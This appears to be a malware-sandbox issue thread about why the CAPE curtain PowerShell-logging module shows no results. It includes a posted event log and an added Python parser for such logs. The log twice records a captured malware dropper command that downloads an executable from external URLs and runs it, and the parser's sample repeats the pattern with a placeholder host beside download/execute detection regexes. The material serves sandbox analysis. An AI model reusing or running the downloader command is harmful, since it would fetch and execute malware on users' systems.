Comments (22)
Nope, I will check this.
from cape.
Are the curtain dependencies listed in the FireEye blog the ones listed in the comments below the blog URL? Or are these in addition to the blog?
In the config you have all the deps you need. I would also suggest upgrading WMF 4 to WMF 5 for PowerShell 5 support.
I see a curtain.log file in my analysis folder, however there is no curtain tab on the results page.
Check the log for details; if there are none, you are missing some deps.
There are 2 full events in the log file.
Can you share it so I can check? Remove your username inside.
<root>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>4100</EventID><Version>1</Version><Level>3</Level><Task>106</Task><Opcode>19</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:43.628864400Z'/><EventRecordID>11</EventRecordID><Correlation ActivityID='{02AC0C48-F800-0001-4DBA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2232'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='ContextInfo'> Severity = Warning
Host Name = ConsoleHost
Host Version = 5.1.14409.1005
Host ID = 01199e23-61d0-4e5d-82ac-674361ed7c53
Host Application = powershell function otpmldctt([string] $beikul){(new-object system.net.webclient).downloadfile($beikul,'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe');start-process 'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe';}try{otpmldctt('http://sabarasourcing.com/mo.bin')}catch{otpmldctt('http://ayuhas.co.in/mo.bin')}
Engine Version = 5.1.14409.1005
Runspace ID = 91c2b171-5620-44e6-8180-a7a93a625ec2
Pipeline ID = 1
Command Name = Start-Process
Command Type = Cmdlet
Script Name =
Command Path =
Sequence Number = 16
User = user1-PC\user1
Connected User =
Shell ID = Microsoft.PowerShell
</Data><Data Name='UserData'></Data><Data Name='Payload'>Error Message = This command cannot be run due to the error: The specified executable is not a valid application for this OS platform..
Fully Qualified Error ID = InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>4100</EventID><Version>1</Version><Level>3</Level><Task>106</Task><Opcode>19</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:42.599262600Z'/><EventRecordID>10</EventRecordID><Correlation ActivityID='{02AC0C48-F800-0001-4CBA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2232'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='ContextInfo'> Severity = Warning
Host Name = ConsoleHost
Host Version = 5.1.14409.1005
Host ID = 01199e23-61d0-4e5d-82ac-674361ed7c53
Host Application = powershell function otpmldctt([string] $beikul){(new-object system.net.webclient).downloadfile($beikul,'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe');start-process 'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe';}try{otpmldctt('http://sabarasourcing.com/mo.bin')}catch{otpmldctt('http://ayuhas.co.in/mo.bin')}
Engine Version = 5.1.14409.1005
Runspace ID = 91c2b171-5620-44e6-8180-a7a93a625ec2
Pipeline ID = 1
Command Name = Start-Process
Command Type = Cmdlet
Script Name =
Command Path =
Sequence Number = 15
User = user1-PC\user1
Connected User =
Shell ID = Microsoft.PowerShell
</Data><Data Name='UserData'></Data><Data Name='Payload'>Error Message = This command cannot be run due to the error: The specified executable is not a valid application for this OS platform..
Fully Qualified Error ID = InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40962</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>2</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:38.574455500Z'/><EventRecordID>9</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-32BA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2400'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>53504</EventID><Version>1</Version><Level>4</Level><Task>111</Task><Opcode>10</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:38.324855100Z'/><EventRecordID>8</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-32BA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2012'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='param1'>2944</Data><Data Name='param2'>DefaultAppDomain</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40961</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>1</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:38.246854900Z'/><EventRecordID>7</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-32BA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2400'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40962</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>2</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:35.782050600Z'/><EventRecordID>6</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-29BA-6F6D6814D401}'/><Execution ProcessID='3016' ThreadID='2852'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>53504</EventID><Version>1</Version><Level>4</Level><Task>111</Task><Opcode>10</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:33.644846800Z'/><EventRecordID>5</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-29BA-6F6D6814D401}'/><Execution ProcessID='3016' ThreadID='2664'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='param1'>3016</Data><Data Name='param2'>DefaultAppDomain</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40961</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>1</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:33.145646000Z'/><EventRecordID>4</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-29BA-6F6D6814D401}'/><Execution ProcessID='3016' ThreadID='2852'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
</root>
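The posted log holds 4100 (pipeline error) events and engine lifecycle events (40961, 40962, 53504) but no 4104 script-block events. The following is an added example, not code from CAPE or from the curtain project: a small parser that counts a curtain.log's events per EventID, pulls the "Key = Value" fields out of each event's ContextInfo and Payload data, and flags host command lines that both download and start a file, so a log that yields nothing downstream can be inspected directly. SAMPLE_LOG is constructed in the same shape as the posted log; its paths, function name and URL are placeholders.

```python
"""Summarize a CAPE curtain.log (Windows PowerShell Operational events under <root>).

Added example, not part of the CAPE or curtain projects. SAMPLE_LOG is a
constructed, trimmed log in the shape of the one posted in the thread; the
URL, file name and function name in it are placeholders.
"""
import re
import xml.etree.ElementTree as ET

EVENT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"

# Constructed sample: one 4100 error event (download-and-run host command that
# failed in Start-Process) and one 40961 engine-lifecycle event with no data.
SAMPLE_LOG = r"""<root>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell'/><EventID>4100</EventID><Level>3</Level><TimeCreated SystemTime='2018-07-05T20:57:43.628864400Z'/><EventRecordID>11</EventRecordID><Execution ProcessID='2944' ThreadID='2232'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel></System><EventData><Data Name='ContextInfo'> Severity = Warning
Host Name = ConsoleHost
Host Application = powershell function stage([string] $u){(new-object system.net.webclient).downloadfile($u,'C:\Users\user1\AppData\Local\Temp\payload.exe');start-process 'C:\Users\user1\AppData\Local\Temp\payload.exe';}stage('http://example.invalid/stage2.bin')
Command Name = Start-Process
Command Path =
User = user1-PC\user1
</Data><Data Name='UserData'></Data><Data Name='Payload'>Error Message = This command cannot be run due to the error: The specified executable is not a valid application for this OS platform..
Fully Qualified Error ID = InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell'/><EventID>40961</EventID><Level>4</Level><TimeCreated SystemTime='2018-07-05T20:57:38.246854900Z'/><EventRecordID>7</EventRecordID><Execution ProcessID='2944' ThreadID='2400'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel></System><EventData></EventData></Event>
</root>"""

# Indicators of "fetch something" and "run something" in a host command line.
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I)
EXEC_RE = re.compile(r"start-process|invoke-expression|\biex\b", re.I)


def _tag(name: str) -> str:
    """Qualify a tag name with the Windows event XML namespace."""
    return f"{{{EVENT_NS}}}{name}"


def parse_kv_block(text: str) -> dict:
    """Parse the 'Key = Value' lines found in ContextInfo and Payload data fields."""
    fields = {}
    for line in (text or "").splitlines():
        if "=" not in line:
            continue
        key, _, value = line.partition("=")  # split on the first '=' only
        fields[key.strip()] = value.strip()
    return fields


def parse_curtain_log(xml_text: str) -> list:
    """Return one dict per <Event>, in the order the log lists them."""
    root = ET.fromstring(xml_text)
    events = []
    for ev in root.iter(_tag("Event")):
        system = ev.find(_tag("System"))
        data = {d.get("Name"): (d.text or "") for d in ev.iter(_tag("Data"))}
        events.append({
            "event_id": int(system.findtext(_tag("EventID"))),
            "record_id": int(system.findtext(_tag("EventRecordID"))),
            "time": system.find(_tag("TimeCreated")).get("SystemTime"),
            "pid": int(system.find(_tag("Execution")).get("ProcessID")),
            "context": parse_kv_block(data.get("ContextInfo")),
            "payload": parse_kv_block(data.get("Payload")),
        })
    return events


def summarize(events: list) -> dict:
    """Count events per EventID (4104 = script block, 4100 = pipeline error)."""
    counts = {}
    for ev in events:
        counts[ev["event_id"]] = counts.get(ev["event_id"], 0) + 1
    return counts


def find_download_execute(events: list) -> list:
    """Record IDs of events whose host command line both downloads and runs a file."""
    hits = []
    for ev in events:
        cmd = ev["context"].get("Host Application", "")
        if DOWNLOAD_RE.search(cmd) and EXEC_RE.search(cmd):
            hits.append(ev["record_id"])
    return hits


if __name__ == "__main__":
    parsed = parse_curtain_log(SAMPLE_LOG)
    print("events per EventID:", summarize(parsed))
    for ev in parsed:
        err = ev["payload"].get("Error Message")
        if err:
            print(f"record {ev['record_id']} pid {ev['pid']}: {err}")
    print("download-and-execute records:", find_download_execute(parsed))
```

Pointing `parse_curtain_log` at the contents of a real curtain.log shows in one glance whether any 4104 script-block events exist at all, and surfaces the per-event error text and the host command line that produced it.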
Weird, the log is fine. Can you share the sample to test here?
MD5 - 23c982cd033934dd1f173e4e6bcd8c0b if you have access to VT.
I believe I've already submitted to CAPE instance.
OK, I just executed standalone curtain on the log and it returns an empty dict.
I'm not sure, but I think it is related to: Error Message = This command cannot be run due to the error: The specified executable is not a valid application for this OS platform.. Fully Qualified Error ID = InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
I will check it better tomorrow.
Testing your sample.
Thanks, I see that it ran on the CAPE instance without that error. Not sure why the VM is behaving that way. It's a 64-bit Win7 w/SP1 and just the curtain dependencies.
win7sp1x32; I think your problem is related to that error.
Is there something I need to do to get powershell scripts to run in Windows VMs? I can't seem to get this to run in my 64-bit VM, but it runs on the CAPE instance 64-bit VM just fine.
https://github.com/karttoon/curtain
@doomedraven Can you give me some context for this? Is this to help troubleshoot why my PS is not executing?
By the way, I am running version 5.1
I understood you incorrectly. So it works in the VM with CAPE but not in a standalone VM?
My 64-bit Win 7 VM generates the PS error when I run it on my Cuckoo instance. When I run on the Ctxis CAPE instance on a 64-bit VM it runs without the error. I'm trying to figure out why my 64-bit VM is giving me the PS error.
No idea, sorry.
@enzok I just checked; the main problem is that the aux conf isn't passed to the VM, so it can't be configured. To disable it, you need to set do_run=False in analyzer/windows/modules/auxiliary/curtain.py
Thanks for checking.